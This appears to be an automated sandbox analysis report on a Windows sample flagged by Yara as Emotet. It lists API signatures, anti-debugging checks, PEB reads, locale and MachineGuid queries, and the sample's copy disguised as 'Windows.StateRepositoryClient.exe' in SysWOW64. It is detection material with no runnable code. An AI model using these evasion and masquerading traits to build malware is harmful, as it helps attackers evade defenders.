Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 0_2_022A38A0
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 0_2_022A38A0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 2_2_023B38A0
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933904414.0000000002AA0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW8
Source: svchost.exe, 00000001.00000002.679765138.000001F66B660000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.724405286.0000013D946A0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.739882896.00000237F9940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.772142896.0000028A68200000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933061753.00000000007E4000.00000004.00000020.sdmp, svchost.exe, 00000007.00000002.770987561.0000028A672E6000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000001.00000002.679765138.000001F66B660000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.724405286.0000013D946A0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.739882896.00000237F9940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.772142896.0000028A68200000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000001.00000002.679765138.000001F66B660000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.724405286.0000013D946A0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.739882896.00000237F9940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.772142896.0000028A68200000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000001.00000002.679765138.000001F66B660000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.724405286.0000013D946A0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.739882896.00000237F9940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.772142896.0000028A68200000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933904414.0000000002AA0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW8
Source: svchost.exe, 00000001.00000002.679765138.000001F66B660000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.724405286.0000013D946A0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.739882896.00000237F9940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.772142896.0000028A68200000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933061753.00000000007E4000.00000004.00000020.sdmp, svchost.exe, 00000007.00000002.770987561.0000028A672E6000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000001.00000002.679765138.000001F66B660000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.724405286.0000013D946A0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.739882896.00000237F9940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.772142896.0000028A68200000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000001.00000002.679765138.000001F66B660000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.724405286.0000013D946A0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.739882896.00000237F9940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.772142896.0000028A68200000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000001.00000002.679765138.000001F66B660000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.724405286.0000013D946A0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.739882896.00000237F9940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.772142896.0000028A68200000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00401D89 __EH_prolog3,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_00401D89
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00401D89 __EH_prolog3,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_00401D89
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00416C5D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00416C5D
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00416C5D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00416C5D
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00401D89 __EH_prolog3,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_00401D89
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00401D89 __EH_prolog3,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_00401D89
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A3ED0 mov eax, dword ptr fs:[00000030h] 0_2_022A3ED0
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A4DF0 mov eax, dword ptr fs:[00000030h] 0_2_022A4DF0
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02135A6E mov eax, dword ptr fs:[00000030h] 0_2_02135A6E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213095E mov eax, dword ptr fs:[00000030h] 0_2_0213095E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213698E mov eax, dword ptr fs:[00000030h] 0_2_0213698E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02130456 mov eax, dword ptr fs:[00000030h] 0_2_02130456
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02231030 mov eax, dword ptr fs:[00000030h] 0_2_02231030
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A3ED0 mov eax, dword ptr fs:[00000030h] 0_2_022A3ED0
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A4DF0 mov eax, dword ptr fs:[00000030h] 0_2_022A4DF0
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02135A6E mov eax, dword ptr fs:[00000030h] 0_2_02135A6E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213095E mov eax, dword ptr fs:[00000030h] 0_2_0213095E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213698E mov eax, dword ptr fs:[00000030h] 0_2_0213698E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02130456 mov eax, dword ptr fs:[00000030h] 0_2_02130456
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02231030 mov eax, dword ptr fs:[00000030h] 0_2_02231030
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B3ED0 mov eax, dword ptr fs:[00000030h] 2_2_023B3ED0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B4DF0 mov eax, dword ptr fs:[00000030h] 2_2_023B4DF0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C5A6E mov eax, dword ptr fs:[00000030h] 2_2_022C5A6E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C095E mov eax, dword ptr fs:[00000030h] 2_2_022C095E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C698E mov eax, dword ptr fs:[00000030h] 2_2_022C698E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C0456 mov eax, dword ptr fs:[00000030h] 2_2_022C0456
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_02321030 mov eax, dword ptr fs:[00000030h] 2_2_02321030
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A3070 PathFindExtensionW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap, 0_2_022A3070
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A3070 PathFindExtensionW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap, 0_2_022A3070
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_004159BE SetUnhandledExceptionFilter, 0_2_004159BE
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00416C5D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00416C5D
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00411CFF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00411CFF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00417C9C SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00417C9C
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_004159BE SetUnhandledExceptionFilter, 0_2_004159BE
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00416C5D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00416C5D
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00411CFF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00411CFF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00417C9C SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00417C9C
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_004159BE SetUnhandledExceptionFilter, 2_2_004159BE
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00416C5D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00416C5D
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00411CFF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00411CFF
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00417C9C SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00417C9C
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933089387.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933089387.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933089387.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Progman
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933089387.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933089387.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933089387.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933089387.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Progman
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933089387.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0041786B cpuid 0_2_0041786B
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0041786B cpuid 0_2_0041786B
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA, 0_2_0041F472
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA, 0_2_00425417
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoW, 0_2_0041F41E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetProcAddress,GetLocaleInfoW,LoadLibraryW, 0_2_0040D4E2
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA, 0_2_00425774
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 0_2_004217F8
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 0_2_00422876
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA, 0_2_00425880
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: __getptd,GetLocaleInfoA, 0_2_0042190F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA,_strlen, 0_2_004219A7
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: __getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen, 0_2_00421A1B
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: __getptd,GetLocaleInfoA, 0_2_00421BED
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: _strlen,_strlen,EnumSystemLocalesA, 0_2_00421CAE
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: __getptd,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 0_2_00421D51
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: _strlen,EnumSystemLocalesA, 0_2_00421D15
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA, 0_2_0041F472
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA, 0_2_00425417
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoW, 0_2_0041F41E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetProcAddress,GetLocaleInfoW,LoadLibraryW, 0_2_0040D4E2
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA, 0_2_00425774
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 0_2_004217F8
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 0_2_00422876
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA, 0_2_00425880
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: __getptd,GetLocaleInfoA, 0_2_0042190F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: GetLocaleInfoA,_strlen, 0_2_004219A7
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: __getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen, 0_2_00421A1B
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: __getptd,GetLocaleInfoA, 0_2_00421BED
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: _strlen,_strlen,EnumSystemLocalesA, 0_2_00421CAE
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: __getptd,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 0_2_00421D51
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: _strlen,EnumSystemLocalesA, 0_2_00421D15
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA, 2_2_0041F472
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoA, 2_2_00425417
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoW, 2_2_0041F41E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetProcAddress,GetLocaleInfoW,LoadLibraryW, 2_2_0040D4E2
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoA, 2_2_00425774
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 2_2_004217F8
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 2_2_00422876
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoA, 2_2_00425880
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: __getptd,GetLocaleInfoA, 2_2_0042190F
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: GetLocaleInfoA,_strlen, 2_2_004219A7
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: __getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen, 2_2_00421A1B
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: __getptd,GetLocaleInfoA, 2_2_00421BED
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: _strlen,_strlen,EnumSystemLocalesA, 2_2_00421CAE
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: __getptd,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 2_2_00421D51
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: _strlen,EnumSystemLocalesA, 2_2_00421D15
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_004168FD GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_004168FD
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_004168FD GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_004168FD
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_004031CE GetVersionExA, 0_2_004031CE
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_004031CE GetVersionExA, 0_2_004031CE
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 00000000.00000002.684687959.0000000002234000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.933157182.00000000022C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.933217408.0000000002324000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.684411365.0000000002130000.00000040.00000001.sdmp, type: MEMORY